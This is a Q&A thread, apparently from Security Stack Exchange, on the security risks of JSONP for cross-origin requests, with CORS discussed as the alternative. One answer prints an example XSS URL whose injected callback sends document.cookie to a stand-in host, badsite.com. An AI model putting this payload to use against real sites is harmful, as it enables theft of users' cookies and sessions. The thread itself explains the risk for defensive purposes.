# Security risks with JSONP?

Tags: web-application, ajax, json, jsonp

What are the security risks with [JSONP](https://en.wikipedia.org/wiki/JSONP)?  Is using JSONP in a new web application reasonable, from a security perspective, or is it better to use a different method for cross-origin web mashups?

If using JSONP is reasonable, what steps should I take to make sure I'm using it securely?  If it's better to use something else, what would you recommend instead?  (CORS?)

Answer (score 26):

JSONP is a bit dodgy, from a security perspective:

- **Requires excessive trust.**  Suppose you have a page hosted on `a.com` and it uses JSONP to access services provided by `b.org`.  This involves placing 100% trust in `b.org`.  If `b.org` is malicious or buggy, it can subvert the security of the embedding page and all of the `a.com` origin.  This kind of excess trust is dangerous from a security perspective: it makes your application fragile.

  To put it another way: JSONP is basically a self-inflicted XSS.  Yes, OK, I know it's a feature, not a bug, but still...
- **CSRF vulnerabilities.**  You have to remember to defend against CSRF vulnerabilities, and with JSONP, that gets a bit tricky.  Standard advice is to ensure that only POST requests can trigger a side-effect, and to include a CSRF token in all POST requests; but JSONP involves sending a GET request to trigger a side-effect, which ain't exactly the cleanest solution you've ever seen.  So this means that the host that provides JSONP service needs to remember to check CSRF tokens even on GET requests.  Also, it requires a bit of a tricky protocol for the embedding page (`a.com`) to obtain the proper CSRF token from the JSONP service (`b.org`).  It gets messy.
- **Causes mixed-content warnings.** Suppose we have a page hosted on `https://a.com` and it accesses a JSONP service on `http://b.org`.  Then this will inevitably trigger a scary-looking mixed-content warning (since JSONP involving loading a script from `http://b.org`).
- **User authentication gets ugly.** If `b.org` wants to authenticate the user, that gets tricky to do when using JSONP.  The embedding page (`a.com`) needs to first somehow give the user an opportunity to log into `b.org` in advance, before accessing `b.org`'s JSONP service.  Both sites need to coordinate.

I don't know whether web developers should be recommended to avoid JSONP for new web applications or not, but these aspects make CORS look pretty tempting.

See also [What is the point of the same-domain rule for xmlhttprequest when script tags/JSONP can cross domains?](https://security.stackexchange.com/q/13010/971)

Comment: I wrote an answer with the security risks/concerns I know of, but I'm sure my knowledge of the subject is incomplete.   I'd very much welcome answers from others ... including positions on whether new web applications should use JSONP or something else.

Answer (score 13):

**The callback parameter may be an XSS vector**

I found an [answer on stackoverflow](https://stackoverflow.com/a/6892827/328397) that filters the JSONP callback response.  This is needed because the callback parameter can be manipulated into a XSS attack that steals CSRF tokens like this:

```
http://yoursite.com/jsonp.php?callback=(function(){ $(document.body).append('<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'); })//
```

**UTF7 injections are possible if charset isn't included**

If the header is not `Content-Type: application/javascript; charset=utf-8`  then UTF7 injections are possible.

**Content-Type Selection may have an impact**

Content type does [affect the HTTP based compression](https://stackoverflow.com/a/10205560/328397) of certain shared web hosts.

There is some functionality difference between what can be done in some browsers based on the Content-Type.  I'll have to dig up the links from StackOverflow

Answer (score 5):

**The callback parameter may be a CSRF vector via Flash injection.**

See http://quaxio.com/jsonp_handcrafted_flash_files/

Comment: I see the last comment but this is a great write up about this exploit:  http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/